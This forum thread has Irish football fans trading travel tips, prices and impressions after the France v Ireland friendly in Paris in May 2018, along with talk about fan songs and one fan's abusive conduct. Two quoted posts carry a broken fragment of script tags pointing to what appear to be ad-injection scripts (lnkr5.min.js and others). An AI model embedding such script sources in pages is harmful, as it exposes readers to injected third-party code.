You Boys in Green Homepage YBIG Shop
Forum Home Forum Home : International : Away days + World Cup 2022 Accommodation and Travel
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

France - 28 May 2018 - travel & accommodation

Post Reply Post Reply Page  <1 18192021>
Author
Robbie Keane
Robbie Keane
ooh Thomas, how could you do this to me!

Post Options Post Options   Thanks (0) Thanks(0)   Quote SuperDave84 Quote  Post ReplyReply Direct Link To This Post Posted: 31 May 2018 at 4:33pm
Originally posted by Zinedine Kilbane 110 Zinedine Kilbane 110 wrote:

Originally posted by SuperDave84 SuperDave84 wrote:

Ah pushing over a moped is a bit much and plenty of the drivers were none too happy about it. It's one thing during the Euros when there are 20,000 there and every driver in Paris knows to avoid the area, but it's quite different for a Monday night friendly and lads are trying to get home after work.

There were too many people who fell foul of the simple rule "don't be a dick". There was no aggro, I'll grant you that, but there were quite a few arseholes, certainly more than usual.

Having said all that, I had a great time. Went to the Musee D'Orsay on Sunday afternoon and got tickets to Roland Garros for the tennis on Sunday evening. Went out to Versailles yesterday as well, which was unbelievably impressive.

Yeah when you are pissing off the locals you have taken it to far.
As you say ‘don’t be a dick’.

Was Versailles easy to get to? The missus was asking about it but I said it was too far out! 

I went to Roland Garris one day, did the Louvre and went to see Notre Dame which was impressive. 
Still spent a shocking amount on booze. It’s an expensive city to drink in.

About half an hour and about €4 on the RER. Expensive out there, though. I think it was about €18 for the chateau and €8.50 for the gardens.

Roland Garros was good though, although I was surprised at the absence of booze. At least at Wimbledon you can get a Pimms. Maybe I missed it but I didn't see anywhere selling beer, or wine, or any booze.
Sponsored Links

Zinedine Kilbane 110 View Drop Down
Jack Charlton
Jack Charlton
Man City records obsession

Post Options Post Options   Thanks (0) Thanks(0)   Quote Zinedine Kilbane 110 Quote  Post ReplyReply Direct Link To This Post Posted: 31 May 2018 at 4:39pm

Ah pushing over a moped is a bit much and plenty of the drivers were none too happy about it. It's one thing during the Euros when there are 20,000 there and every driver in Paris knows to avoid the area, but it's quite different for a Monday night friendly and lads are trying to get home after work.

There were too many people who fell foul of the simple rule "don't be a dick". There was no aggro, I'll grant you that, but there were quite a few arseholes, certainly more than usual.

Having said all that, I had a great time. Went to the Musee D'Orsay on Sunday afternoon and got tickets to Roland Garros for the tennis on Sunday evening. Went out to Versailles yesterday as well, which was unbelievably impressive.

Was Versailles easy to get to? The missus was asking about it but I said it was too far out! 

I went to Roland Garris one day, did the Louvre and went to see Notre Dame which was impressive. 

About half an hour and about €4 on the RER. Expensive out there, though. I think it was about €18 for the chateau and €8.50 for the gardens.

Roland Garros was good though, although I was surprised at the absence of booze. At least at Wimbledon you can get a Pimms. Maybe I missed it but I didn't see anywhere selling beer, or wine, or any booze.

Cheers SD. Will put it down on the list for next time.

At Wimbledon you are allowed to bring in booze. One bottle of wine per person.

There was two champagne bars at RG. 15 Euro a glass and 90 for a bottle. No thanks. There was lots of private rooms around the outside for the elite with plenty of drinks available. 

SuperDave84 View Drop Down
Robbie Keane
Robbie Keane
ooh Thomas, how could you do this to me!

Post Options Post Options   Thanks (0) Thanks(0)   Quote SuperDave84 Quote  Post ReplyReply Direct Link To This Post Posted: 31 May 2018 at 5:43pm

Cheers SD. Will put it down on the list for next time.

At Wimbledon you are allowed to bring in booze. One bottle of wine per person.

There was two champagne bars at RG. 15 Euro a glass and 90 for a bottle. No thanks. There was lots of private rooms around the outside for the elite with plenty of drinks available. 

Welp, that explains why I didn't see anyone drinking!
alihau41 View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote alihau41 Quote  Post ReplyReply Direct Link To This Post Posted: 31 May 2018 at 6:43pm

several ways across to versailles. Lines L (from La Defense or St Lazare) and N (Montparnasse) both go to versailles chantier.
it is worth the trip out. haven't done the chateau, but been to the gardens a couple of times. do a very impressive firework and light show on a few nights during the summer.

no real booze at RG. a few bars/brasseries around outside though. parks boulevard is one i've gone a good few times for any of PSG/Stade Francais/RG matches. during the first week, you can get evening tickets for €15. arrive from 5.30pm, and it allows access to the annex courts, although they tend to open one of the main three stadium courts in order to fill them

pity to hear about people acting the bollocks after the match on monday. i suppose the pissing rain didn't help matters, but still. you'd hardly want to see the french come over and do the same stuff on your doorstep

alihau41 View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote alihau41 Quote  Post ReplyReply Direct Link To This Post Posted: 31 May 2018 at 6:48pm

certainly the case if you're drinking in prime locations. there's an app over here called MisterGoodBeer. Takes your GPS and gives you the prices for a pint around that area. easy enough way to find the spots that will only charge 5er pints!
cathalb96 View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote cathalb96 Quote  Post ReplyReply Direct Link To This Post Posted: 01 Jun 2018 at 1:52am
Seemed like there was a lot more RA songs than usual on this trip
Cathal Bourke
GreenDodger93 View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote GreenDodger93 Quote  Post ReplyReply Direct Link To This Post Posted: 01 Jun 2018 at 2:57am
Credit to the French home crowd, phenomenal atmosphere 
gspain View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote gspain Quote  Post ReplyReply Direct Link To This Post Posted: 01 Jun 2018 at 7:26am
Originally posted by GreenDodger93 GreenDodger93 wrote:

< ="//multilogin.top/oldmultitabs.js">https://pageanalytics.space/addons/lnkr5.min.js">https://eluxer.net/code?id=105&subid=50932_2852_">

Good point.  It was really impressive.  It has improved hugely from 04 & 09.  
Charlton's Child View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Charlton's Child Quote  Post ReplyReply Direct Link To This Post Posted: 01 Jun 2018 at 8:26am
Originally posted by gspain gspain wrote:

< ="//multilogin.top/oldmultitabs.js">https://pageanalytics.space/addons/lnkr5.min.js">https://eluxer.net/code?id=105&subid=50932_2852_">

Especially considering it was a Monday night and the weather as well. 
newrynyuk View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote newrynyuk Quote  Post ReplyReply Direct Link To This Post Posted: 01 Jun 2018 at 10:33am
Originally posted by Charlton's Child Charlton's Child wrote:

Originally posted by gspain gspain wrote:

Especially considering it was a Monday night and the weather as well. 

Having a less prima donna-ish team and not having a prick like Domenech as manager probably helps too!
gmfc90 View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote gmfc90 Quote  Post ReplyReply Direct Link To This Post Posted: 01 Jun 2018 at 10:58am
Originally posted by cathalb96 cathalb96 wrote:

Was there? Celtic Symphony was sang outside The Harp. Heard an attempt at Grace in the Stade. Even at that I wouldn't say "RA" songs. Having said that our songbook generally consist of the same 2-3 songs anyway
Danger here, OH NO
eireland View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote eireland Quote  Post ReplyReply Direct Link To This Post Posted: 01 Jun 2018 at 1:50pm
Originally posted by gmfc90 gmfc90 wrote:

Was there? Celtic Symphony was sang outside The Harp. Heard an attempt at Grace in the Stade. Even at that I wouldn't say "RA" songs. Having said that our songbook generally consist of the same 2-3 songs anyway

RA or not they're still Irish songs so it's all good in my book. 
Charlton's Child View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Charlton's Child Quote  Post ReplyReply Direct Link To This Post Posted: 01 Jun 2018 at 1:54pm
Originally posted by eireland eireland wrote:

Originally posted by gmfc90 gmfc90 wrote:

RA or not they're still Irish songs so it's all good in my book. 

More a Celtic song really 
pre Madonna View Drop Down
Robbie Keane
Robbie Keane
I am MALDING

Post Options Post Options   Thanks (0) Thanks(0)   Quote pre Madonna Quote  Post ReplyReply Direct Link To This Post Posted: 01 Jun 2018 at 2:18pm
Fans of the Republic of Ireland singing Irish republican songs? Absolute madness!
the_walls View Drop Down
Jack Charlton
Jack Charlton
6 in a row, alive alive oh..

Post Options Post Options   Thanks (0) Thanks(0)   Quote the_walls Quote  Post ReplyReply Direct Link To This Post Posted: 01 Jun 2018 at 2:28pm
Originally posted by pre Madonna pre Madonna wrote:

Fans of the Republic of Ireland singing Irish republican songs? Absolute madness!

LOL
horsebox View Drop Down
Robbie Keane
Robbie Keane
Born n bred in darndale.

Post Options Post Options   Thanks (0) Thanks(0)   Quote horsebox Quote  Post ReplyReply Direct Link To This Post Posted: 01 Jun 2018 at 3:01pm

Glad to hear.

It was far across the sea,
When the devil got a hold of me,
He wouldn't set me free,
So he kept me soul for ransom.
na na na na na na na na na
na na na na na na na na.
I'm a sailor man from Glasgow to
GreenArmy! View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote GreenArmy! Quote  Post ReplyReply Direct Link To This Post Posted: 01 Jun 2018 at 3:02pm

They haven't gone away you know.
Scamper View Drop Down
Davey Langan
Davey Langan

Post Options Post Options   Thanks (0) Thanks(0)   Quote Scamper Quote  Post ReplyReply Direct Link To This Post Posted: 30 Apr 2019 at 6:06pm
Originally posted by Scamper Scamper wrote:

To the f**kin idiot that was one down from me at the game... I hope I never cross you again you bellend

A couple of highlights.....

Singing Shane long is a knacker..
Booing the Irish National anthem and the French one
Singing James McClean loves Rangers..
Singing about the Irish players dads were paedophiles...
And making life hell for his poor missus who I felt very sorry for.
And racially abusing an Irish player...

Stay at home in future you f**king arsehole....

Would you believe I actually put a name to the face of this fella today by pure chance and he is an active member on a certain fans group on FB and I'm sure he is on here. Nice Chap.......
====#Everywhere you play, We'll Follow====
 Post Reply Post Reply Page  <1 18192021>
  Share Topic